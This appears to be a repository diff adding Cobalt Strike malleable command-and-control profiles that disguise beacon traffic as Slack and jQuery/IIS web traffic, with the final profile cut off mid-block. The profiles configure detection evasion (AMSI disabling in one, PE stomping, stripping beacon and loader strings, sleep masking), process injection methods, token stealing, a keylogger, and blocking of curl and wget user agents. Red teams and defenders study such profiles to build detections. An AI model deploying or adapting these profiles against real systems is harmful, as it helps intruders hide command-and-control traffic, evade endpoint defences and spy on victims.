     117 + set uri "/api/api.test";
     118 + 
     119 + client {
     120 + 
     121 +# header "Host" "msdevchat.slack.com";
     122 + header "Accept" "*/*";
     123 + header "Accept-Language" "en-US";
     124 +
     125 + output {
     126 + base64url;
     127 +
     128 + append ";_ga=GA1.2.875";
     129 + append "__ar_v4=%8867UMDGS643";
     130 + prepend "d=";
     131 +# prepend "cvo_sid1=R456BNMD64;";
     132 + prepend "_ga=GA1.2.875;";
     133 + prepend "b=.12vPkW22o;";
     134 + header "Cookie";
     135 + 
     136 + 
     137 + }
     138 + 
     139 + 
     140 + id {
     141 +#not sure on this, just trying to blend it in.
     142 + base64url;
     143 + prepend "GA1.";
     144 + header "_ga";
     145 + 
     146 + }
     147 + }
     148 + 
     149 + server {
     150 + 
     151 + header "Content-Type" "application/json; charset=utf-8";
     152 + header "Connection" "close";
     153 + header "Server" "Apache";
     154 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     155 + header "Referrer-Policy" "no-referrer";
     156 + header "X-Content-Type-Options" "nosniff";
     157 + header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
     158 + header "X-XSS-Protection" "0";
     159 + header "X-Slack-Backend" "h";
     160 + header "Vary" "Accept-Encoding";
     161 + header "Access-Control-Allow-Origin" "*";
     162 + header "X-Via" "haproxy-www-6g1x";
     163 +
     164 + 
     165 + output {
     166 + base64;
     167 + 
     168 + prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
     169 + append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
     170 + 
     171 + print;
     172 + }
     173 + }
     174 +}
     175 + 
     176 +http-stager {
     177 + 
     178 + set uri_x86 "/messages/DALBNSf25";
     179 + set uri_x64 "/messages/DALBNSF25";
     180 + 
     181 + client {
     182 + header "Accept" "*/*";
     183 + header "Accept-Language" "en-US,en;q=0.5";
     184 + header "Accept-Encoding" "gzip, deflate";
     185 + header "Connection" "close";
     186 + }
     187 + 
     188 + server {
     189 + header "Content-Type" "text/html; charset=utf-8";
     190 + header "Connection" "close";
     191 + header "Server" "Apache";
     192 + header "X-XSS-Protection" "0";
     193 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     194 + header "Referrer-Policy" "no-referrer";
     195 + header "X-Slack-Backend" "h";
     196 + header "Pragma" "no-cache";
     197 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     198 + header "X-Frame-Options" "SAMEORIGIN";
     199 + header "Vary" "Accept-Encoding";
     200 + header "X-Via" "haproxy-www-suhx";
     201 +
     202 + }
     203 + 
     204 + 
     205 +}
     206 + 
     207 +###Malleable PE Options###
     208 + 
     209 +post-ex {
     210 + 
     211 + set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
     212 + set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
     213 + 
     214 + set obfuscate "true";
     215 + 
     216 + set smartinject "true";
     217 + 
     218 + set amsi_disable "true";
     219 + 
     220 +}
     221 + 
     222 +#used peclone on wwanmm.dll.
     223 +#don't use 'set image_size_xx' if using 'set module_xx'
     224 +stage {
     225 + set checksum "0";
     226 + set compile_time "25 Oct 2016 01:57:23";
     227 + set entry_point "170000";
     228 +# set image_size_x86 "6586368";
     229 +# set image_size_x64 "6586368";
     230 +# set name "WWanMM.dll";
     231 + set userwx "false";
     232 + set cleanup "true";
     233 + set stomppe "true";
     234 + set obfuscate "true";
     235 + set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
     236 + 
     237 + 
     238 +#module stomp
     239 + 
     240 +#don't use 'set image_size_xx' if using 'set module_xx'
     241 + set module_x86 "wwanmm.dll";
     242 + set module_x64 "wwanmm.dll";
     243 + 
     244 + transform-x86 {
     245 + prepend "\x90\x90\x90";
     246 + strrep "ReflectiveLoader" "";
     247 + strrep "beacon.dll" "";
     248 + }
     249 + 
     250 + transform-x64 {
     251 + prepend "\x90\x90\x90";
     252 + strrep "ReflectiveLoader" "";
     253 + strrep "beacon.x64.dll" "";
     254 + }
     255 + 
     256 +}
     257 +process-inject {
     258 + 
     259 + set allocator "NtMapViewOfSection";
     260 + 
     261 + set min_alloc "16700";
     262 + 
     263 + set userwx "false";
     264 +
     265 + set startrwx "true";
     266 +
     267 + transform-x86 {
     268 + prepend "\x90\x90\x90";
     269 + }
     270 + transform-x64 {
     271 + prepend "\x90\x90\x90";
     272 + }
     273 + 
     274 + execute {
     275 + CreateThread "ntdll!RtlUserThreadStart";
     276 + CreateThread;
     277 + NtQueueApcThread;
     278 + CreateRemoteThread;
     279 + RtlCreateUserThread;
     280 + }
     281 +}
     282 + 
  • ■ ■ ■ ■ ■ ■
    Profiles/Slack/slack_modified.profile
     1 +#slack profile
     2 +#used a MS dev group from a 'top slack groups' list
     3 +#xx0hcd
     4 +#Modified by Kleiton Kurti (@kleiton0x7e)
     5 + 
     6 +set host_stage "false"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.
     7 +set sleeptime "30000";
     8 +set jitter "20";
     9 +set useragent "<RAND>"; # "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"; Use random Internet Explorer UA by default
     10 +set dns_idle "8.8.8.8";
     11 +set maxdns "235";
     12 + 
     13 +#custom cert
     14 +#https-certificate {
     15 +# set keystore "your_store_file.store";
     16 +# set password "your_store_pass";
     17 +#}
     18 + 
     19 +http-config {
     20 +# set headers "Server, Content-Type, Cache-Control, Connection";
     21 +# header "Content-Type" "text/html;charset=UTF-8";
     22 +# header "Connection" "close";
     23 +# header "Cache-Control" "max-age=2";
     24 +# header "Server" "nginx";
     25 + #set "true" if teamserver is behind redirector
     26 + set trust_x_forwarded_for "false";
     27 +}
     28 + 
     29 +http-get {
     30 + 
     31 + set uri "/messages/A1537B0GM";
     32 +
     33 + client {
     34 + 
     35 +# header "Host" "msdevchat.slack.com";
     36 + header "Accept" "*/*";
     37 + header "Accept-Language" "en-US";
     38 + header "Connection" "close";
     39 +
     40 +
     41 + metadata {
     42 + base64url;
     43 +
     44 + append ";_ga=GA1.2.875";
     45 + append ";__ar_v4=%8867UMDGS643";
     46 + prepend "d=";
     47 +# prepend "cvo_sid1=R456BNMD64;";
     48 + prepend "_ga=GA1.2.875;";
     49 + prepend "b=.12vPkW22o;";
     50 + header "Cookie";
     51 + 
     52 + }
     53 + 
     54 + }
     55 + 
     56 + server {
     57 + 
     58 + header "Content-Type" "text/html; charset=utf-8";
     59 + header "Connection" "close";
     60 + header "Server" "Apache";
     61 + header "X-XSS-Protection" "0";
     62 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     63 + header "Referrer-Policy" "no-referrer";
     64 + header "X-Slack-Backend" "h";
     65 + header "Pragma" "no-cache";
     66 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     67 + header "X-Frame-Options" "SAMEORIGIN";
     68 + header "Vary" "Accept-Encoding";
     69 + header "X-Via" "haproxy-www-w6k7";
     70 +
     71 + 
     72 + output {
     73 + 
     74 + base64url;
     75 + 
     76 + prepend "<!DOCTYPE html>
     77 +<html lang=\"en-US\" class=\"supports_custom_scrollbar\">
     78 + 
     79 + <head>
     80 + 
     81 +<meta charset=\"utf-8\">
     82 +<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">
     83 +<meta name=\"referrer\" content=\"no-referrer\">
     84 +<meta name=\"superfish\" content=\"nofish\">
     85 + <title>Microsoft Developer Chat Slack</title>
     86 + <meta name=\"author\" content=\"Slack\">
     87 +
     88 + 
     89 + <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";
     90 + 
     91 + append "\"> </script>";
     92 +
     93 + append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">
     94 + 
     95 +
     96 +<div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">
     97 + <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>
     98 + 
     99 + <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">
     100 + Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>
     101 + </div>
     102 + 
     103 + <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">
     104 + We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\">
     105 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •
     106 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •
     107 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>
     108 + </span>
     109 + </div>";
     110 + 
     111 + print;
     112 + }
     113 + }
     114 +}
     115 + 
     116 +http-post {
     117 +
     118 + set uri "/api/api.test";
     119 + 
     120 + client {
     121 + 
     122 +# header "Host" "msdevchat.slack.com";
     123 + header "Accept" "*/*";
     124 + header "Accept-Language" "en-US";
     125 +
     126 + output {
     127 + base64url;
     128 +
     129 + append ";_ga=GA1.2.875";
     130 + append "__ar_v4=%8867UMDGS643";
     131 + prepend "d=";
     132 +# prepend "cvo_sid1=R456BNMD64;";
     133 + prepend "_ga=GA1.2.875;";
     134 + prepend "b=.12vPkW22o;";
     135 + header "Cookie";
     136 + 
     137 + 
     138 + }
     139 + 
     140 + 
     141 + id {
     142 +#not sure on this, just trying to blend it in.
     143 + base64url;
     144 + prepend "GA1.";
     145 + header "_ga";
     146 + 
     147 + }
     148 + }
     149 + 
     150 + server {
     151 + 
     152 + header "Content-Type" "application/json; charset=utf-8";
     153 + header "Connection" "close";
     154 + header "Server" "Apache";
     155 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     156 + header "Referrer-Policy" "no-referrer";
     157 + header "X-Content-Type-Options" "nosniff";
     158 + header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
     159 + header "X-XSS-Protection" "0";
     160 + header "X-Slack-Backend" "h";
     161 + header "Vary" "Accept-Encoding";
     162 + header "Access-Control-Allow-Origin" "*";
     163 + header "X-Via" "haproxy-www-6g1x";
     164 +
     165 + 
     166 + output {
     167 + base64;
     168 + 
     169 + prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
     170 + append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
     171 + 
     172 + print;
     173 + }
     174 + }
     175 +}
     176 + 
     177 +http-stager {
     178 + 
     179 + set uri_x86 "/messages/DBLANIF13";
     180 + set uri_x64 "/messages/DBLANIF13";
     181 + 
     182 + client {
     183 + header "Accept" "*/*";
     184 + header "Accept-Language" "en-US,en;q=0.5";
     185 + header "Accept-Encoding" "gzip, deflate";
     186 + header "Connection" "close";
     187 + }
     188 + 
     189 + server {
     190 + header "Content-Type" "text/html; charset=utf-8";
     191 + header "Connection" "close";
     192 + header "Server" "Apache";
     193 + header "X-XSS-Protection" "0";
     194 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     195 + header "Referrer-Policy" "no-referrer";
     196 + header "X-Slack-Backend" "h";
     197 + header "Pragma" "no-cache";
     198 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     199 + header "X-Frame-Options" "SAMEORIGIN";
     200 + header "Vary" "Accept-Encoding";
     201 + header "X-Via" "haproxy-www-suhx";
     202 +
     203 + }
     204 + 
     205 + 
     206 +}
     207 + 
     208 +###Malleable PE Options###
     209 +###Post-Ex Block###
     210 +post-ex {
     211 + set spawnto_x86 "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding";
     212 + set spawnto_x64 "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding";
     213 + set obfuscate "true";
     214 + set smartinject "true";
     215 + set amsi_disable "false";
     216 + set keylogger "GetAsyncKeyState";
     217 + #set threadhint "module!function+0x##"
     218 +}
     219 + 
     220 +#used peclone on wwanmm.dll.
     221 +#don't use 'set image_size_xx' if using 'set module_xx'
     222 +###Malleable PE/Stage Block###
     223 +stage {
     224 + set checksum "0";
     225 + set compile_time "5 May 2023 10:52:15";
     226 + set entry_point "170000";
     227 + #set image_size_x86 "6586368";
     228 + #set image_size_x64 "6586368";
     229 + set name "srv.dll";
     230 + set magic_mz_x64 "OOPS";
     231 + set magic_mz_x86 "OOPS";
     232 + set userwx "false";
     233 + set cleanup "true";
     234 + set sleep_mask "true";
     235 + set stomppe "true";
     236 + set obfuscate "true";
     237 + set rich_header "\xe5\xdc\xe0\xbf\x7f\xf9\x78\x26\x9a\x8c\x1b\x50\x87\x38\x89\x6b\x0d\x83\x71\xc4\xa9\xd0\x73\x20\xe2\x75\x4c\xd9\xa4\x8d\x5a\xc7\xea\xc8\x4e\x7e\x9a\x7c\xd9\xfa\xe9\x11\x0f\x3b\xb1\x70\x54\x94\x78\xde\x70\x41\x0f\x44\xa9\x4c";
     238 + set sleep_mask "true";
     239 +
     240 + set smartinject "true";
     241 +
     242 + #set allocator "HeapAlloc";
     243 + set magic_pe "EA";
     244 + 
     245 + set module_x86 "wwanmm.dll";
     246 + set module_x64 "wwanmm.dll";
     247 + 
     248 + transform-x86 {
     249 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     250 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     251 + strrep "ReflectiveLoader" "";
     252 + strrep "beacon.dll" "";
     253 + strrep "beacon.dll" ""; # Remove this text
     254 + strrep "msvcrt.dll" "";
     255 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     256 + }
     257 + 
     258 + transform-x64 {
     259 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     260 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     261 + strrep "ReflectiveLoader" "";
     262 + strrep "beacon.x64.dll" "";
     263 + strrep "beacon.dll" ""; # Remove this text
     264 + strrep "msvcrt.dll" "";
     265 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     266 + strrep "Stack around the variable" "";
     267 + strrep "was corrupted." "";
     268 + strrep "The variable" "";
     269 + strrep "is being used without being initialized." "";
     270 + strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
     271 + strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
     272 + strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
     273 + strrep "Stack memory was corrupted" "";
     274 + strrep "A local variable was used before it was initialized" "";
     275 + strrep "Stack memory around _alloca was corrupted" "";
     276 + strrep "Unknown Runtime Check Error" "";
     277 + strrep "Unknown Filename" "";
     278 + strrep "Unknown Module Name" "";
     279 + strrep "Run-Time Check Failure" "";
     280 + strrep "Stack corrupted near unknown variable" "";
     281 + strrep "Stack pointer corruption" "";
     282 + strrep "Cast to smaller type causing loss of data" "";
     283 + strrep "Stack memory corruption" "";
     284 + strrep "Local variable used before initialization" "";
     285 + strrep "Stack around" "corrupted";
     286 + strrep "operator" "";
     287 + strrep "operator co_await" "";
     288 + strrep "operator<=>" "";
     289 + }
     290 +}
     291 + 
     292 +###Process Inject Block###
     293 +process-inject {
     294 + set allocator "NtMapViewOfSection";
     295 + set bof_allocator "VirtualAlloc";
     296 + set bof_reuse_memory "true";
     297 + set min_alloc "16700";
     298 + set userwx "false";
     299 + set startrwx "false";
     300 +
     301 + transform-x86 {
     302 + prepend "\x0f\x1f\x00\x87\xd2\x42\x0f\x1f\x04\x00\x66\x0f\x1f\x04\x00\x66\x87\xdb\x46\x49\x4c\x41\x66\x87\xc9\x87\xdb\x90\x0f\x1f\x00\x66\x87\xd2\x40\x87\xc9\x47\x66\x90\x40\x48\x44\x0f\x1f\x00\x43\x45";
     303 + }
     304 + transform-x64 {
     305 + prepend "\x0f\x1f\x00\x87\xd2\x42\x0f\x1f\x04\x00\x66\x0f\x1f\x04\x00\x66\x87\xdb\x46\x49\x4c\x41\x66\x87\xc9\x87\xdb\x90\x0f\x1f\x00\x66\x87\xd2\x40\x87\xc9\x47\x66\x90\x40\x48\x44\x0f\x1f\x00\x43\x45";
     306 + }
     307 + 
     308 + execute {
     309 + #CreateThread;
     310 + #CreateRemoteThread;
     311 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     312 + SetThreadContext;
     313 + NtQueueApcThread-s;
     314 + #NtQueueApcThread;
     315 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     316 + CreateRemoteThread;
     317 + RtlCreateUserThread;
     318 + }
     319 +}
     320 + 
  • ■ ■ ■ ■ ■ ■
    Profiles/jquery/jquery.profile
     1 +#Author: Kleiton Kurti (@kleiton0x7e) & John Stigerwalt (@jstigerwalt1)
     2 + 
     3 +### Auxiliary Settings ###
     4 +set sample_name "Stigs Random C2 Profile";
     5 +set host_stage "false"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.
     6 +set useragent "<RAND>"; # "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"; Use random Internet Explorer UA by default
     7 +set create_remote_thread "true"; # Allow beacon to create threads in other processes
     8 +set hijack_remote_thread "true"; # Allow beacon to run jobs by hijacking the primary thread of a suspeneded process
     9 + 
     10 +### Beacon Sleep Settings ###
     11 +set sleeptime "3000";
     12 +set jitter "33"; # Default jitter factor (0-99%)
     13 + 
     14 +### SMB Options ###
     15 +set pipename "Winsock2\\CatalogChangeListener-###-0";
     16 +set pipename_stager "TSVCPIPE-########-####-4###-####-############";
     17 + 
     18 +### SSH BANNER ###
     19 +set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
     20 +set ssh_pipename "SearchTextHarvester##";
     21 + 
     22 +### Steal Token ###
     23 +set steal_token_access_mask "11";
     24 + 
     25 +### Proxy Options ###
     26 +set tasks_max_size "3604500";
     27 +#set tasks_proxy_max_size "921600";
     28 +#set tasks_dns_proxy_max_size "71680";
     29 + 
     30 + 
     31 +### Main HTTP Config Settings ###
     32 +http-config {
     33 + set headers "Date, Server, Content-Length, Keep-Alive, Contentnection, Content-Type";
     34 + header "Server" "Apache";
     35 + header "Keep-Alive" "timeout=10, max=100";
     36 + header "Connection" "Keep-Alive";
     37 + set trust_x_forwarded_for "true";
     38 + set block_useragents "curl*,lynx*,wget*";
     39 +}
     40 + 
     41 + 
     42 +### HTTPS Cert Settings ###
     43 + 
     44 +https-certificate {
     45 +# Self Signed Certificate Options
     46 +# set CN "*.azureedge.net";
     47 +# set O "Microsoft Corporation";
     48 +# set C "US";
     49 +# set L "Redmond";
     50 +# set ST "WA";
     51 +# set OU "Organizational Unit";
     52 +# set validity "365";
     53 + 
     54 +# Imported Certificate Options
     55 +# set keystore "domain.store";
     56 +# set password "password";
     57 +}
     58 + 
     59 +# code-signer {
     60 +# set keystore "keystore.jks";
     61 +# set password "password";
     62 +# set alias "server";
     63 +# set digest_algorithm "SHA256";
     64 +# set timestamp "false";
     65 +# set timestamp_url "http://timestamp.digicert.com";
     66 +#}
     67 + 
     68 +### Post Exploitation Settings ###
     69 +post-ex {
     70 + set spawnto_x86 "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding";
     71 + set spawnto_x64 "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding";
     72 + set obfuscate "true";
     73 + set smartinject "true";
     74 + set amsi_disable "false";
     75 + set keylogger "GetAsyncKeyState";
     76 + set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
     77 +}
     78 + 
     79 +### Process Injection ###
     80 +process-inject {
     81 + set allocator "NtMapViewOfSection"; # or VirtualAllocEx
     82 + set bof_allocator "VirtualAlloc";
     83 + set bof_reuse_memory "true";
     84 + set min_alloc "24576";
     85 + set startrwx "false";
     86 + set userwx "false";
     87 + 
     88 + transform-x86 {
     89 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     90 + }
     91 + transform-x64 {
     92 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     93 + }
     94 + 
     95 + execute {
     96 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     97 + NtQueueApcThread-s;
     98 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     99 + CreateRemoteThread;
     100 + RtlCreateUserThread;
     101 + SetThreadContext;
     102 + }
     103 +}
     104 + 
     105 + 
     106 +http-get {
     107 + set verb "GET"; # GET / POST
     108 + set uri "/css3/index2.shtml"; # Can be space separated string. Each beacon will be assigned one of these when the stage is built
     109 + 
     110 + client {
     111 + header "Accept" "text/html, application/xhtml+xml, image/jxr, */*";
     112 + header "Accept-Encoding" "gzip, deflate";
     113 + header "Accept-Language" "en-US; q=0.7, en; q=0.3";
     114 + header "Connection" "keep-alive";
     115 + header "DNT" "1";
     116 + 
     117 + metadata {
     118 + base64url;
     119 + parameter "accept";
     120 + }
     121 + }
     122 + 
     123 + server {
     124 + header "Content-Type" "application/yin+xml";
     125 + header "Server" "IBM_HTTP_Server/6.0.2.19 Apache/2.0.47 (Unix) DAV/2";
     126 + 
     127 + output{
     128 + base64;
     129 + print;
     130 + }
     131 + }
     132 +}
     133 + 
     134 +http-post {
     135 + set verb "POST"; # GET / POST
     136 + set uri "/tools/family.html";
     137 + client {
     138 + header "Accept" "text/html, application/xhtml+xml, */*";
     139 + header "Accept-Encoding" "gzip, deflate";
     140 + header "DNT" "1";
     141 + header "Content-Type" "application/x-www-form-urlencoded";
     142 + 
     143 + id {
     144 + base64;
     145 + prepend "token=";
     146 + header "Cookie";
     147 + }
     148 + 
     149 + output{
     150 + base64url;
     151 + prepend "input=";
     152 + print;
     153 + }
     154 + }
     155 + 
     156 + server {
     157 + header "Content-Type" "text/vnd.fly";
     158 + header "Server" "IBM_HTTP_Server/6.0.2.19 Apache/2.0.47 (Unix) DAV/2";
     159 + 
     160 + output {
     161 + base64;
     162 + print;
     163 + }
     164 + }
     165 +}
     166 + 
     167 + 
     168 +### Start of Real HTTP GET and POST settings ###
     169 + 
     170 +http-get "msrpc-azure" { # Don't think of this in terms of HTTP POST, as a beacon transaction of pushing data to the server
     171 + 
     172 + set uri "/compare/v1.44/VXK7P0GBE8"; # URI used for GET requests
     173 + set verb "GET";
     174 + 
     175 + client {
     176 + 
     177 + header "Accept" "image/*, application/json, text/html";
     178 + header "Accept-Language" "nb";
     179 + header "Accept-Encoding" "br, compress";
     180 + header "Access-X-Control" "True";
     181 + 
     182 + metadata {
     183 + mask; # Transform type
     184 + base64url; # Transform type
     185 + prepend "SESSIONID_XVQD0C55VSGX3JM="; # Cookie value
     186 + header "Cookie"; # Cookie header
     187 + }
     188 + }
     189 + 
     190 + server {
     191 + 
     192 + header "Server" "Microsoft-IIS/10.0";
     193 + header "X-Powered-By" "ASP.NET";
     194 + header "Cache-Control" "max-age=0, no-cache";
     195 + header "Pragma" "no-cache";
     196 + header "Connection" "keep-alive";
     197 + header "Content-Type" "application/javascript; charset=utf-8";
     198 + output {
     199 + mask; # Transform type
     200 + base64url; # Transform type
     201 + prepend "/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */ !function(a,b){'object'==typeof module&&'object'==typeof module.exp orts?module.exports=a.document?b(a,!0):function(a){if(!a.document)th row new Error('jQuery requires a window with a document');return b(a )}:b(a)}('undefined'!=typeof window?window:this,function(a,b){var c= [],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.t oString,k=i.hasOwnProperty,l={},m='2.2.4',n=function(a,b){return new n.fn.init(a,b)},o=/^[suFEFFxA0]+|[suFEFFxA0]+$/g,p=/^-ms-/,q=/- ([da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype ={jquery:m,constructor:n,selector:'',length:0,toArray:function(){retu rn e.call(this)},get:function(a){return null!=a?0>a?this[a+this.lengt h]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.con structor(),a);return b.prevObject=this,b.context=this.context,b},each:";
     202 + append "/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */ !function(e,t){'use strict';'object'==typeof module&&'object'==typeof module.exports? module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error('jQuery requires a window with a document');return t(e)}:t(e)}('undefined'!=typeof window?window :this,function(C,e){'use strict';var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice ,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l= a.call(Object),y={},m=function(e){return'function'==typeof e&&'number'!=typeof e.nodeType} ,x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};fun ction b(e,t,n){var r,i,o=(n=n||E).createElement('script');if(o.text=e,t)for(r in c)(i=t[ r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode;";
     203 + print;
     204 + }
     205 + 
     206 + }
     207 +}
     208 + 
     209 +http-post "msrpc-azure" { # Don't think of this in terms of HTTP POST, as a beacon transaction of pushing data to the server
     210 + 
     211 + set uri "/Construct/v1.85/JDX894ZM2WF1"; # URI used for POST block.
     212 + set verb "POST"; # HTTP verb used in POST block. Can be GET or POST
     213 + 
     214 + client {
     215 + 
     216 + header "Accept" "application/xml, application/xhtml+xml, application/json";
     217 + header "Accept-Language" "tn";
     218 + header "Accept-Encoding" "identity, *";
     219 + header "Access-X-Control" "True";
     220 + 
     221 + id {
     222 + mask; # Transform type
     223 + netbiosu; # Transform type
     224 + parameter "_KZZUEUVN";
     225 + }
     226 + 
     227 + output {
     228 + mask; # Transform type
     229 + netbios; # Transform type
     230 + print;
     231 + }
     232 + }
     233 + 
     234 + server {
     235 + 
     236 + header "Server" "Microsoft-IIS/10.0";
     237 + header "X-Powered-By" "ASP.NET";
     238 + header "Cache-Control" "max-age=0, no-cache";
     239 + header "Pragma" "no-cache";
     240 + header "Connection" "keep-alive";
     241 + header "Content-Type" "application/javascript; charset=utf-8";
     242 + 
     243 + output {
     244 + mask; # Transform type
     245 + netbiosu; # Transform type
     246 + prepend "/*! jQuery UI - v1.12.1 - 2016-09-14 * http://jqueryui.com * Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js , effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect -fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effe cts/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-s ize.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mix in.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio. js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable .js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, w idgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, w idgets/sortable.js, widgets/spinner.js, widgets/tabs.js, widgets/tooltip.js * Copyright jQuery Foundation and other contributors; Licensed MIT */";
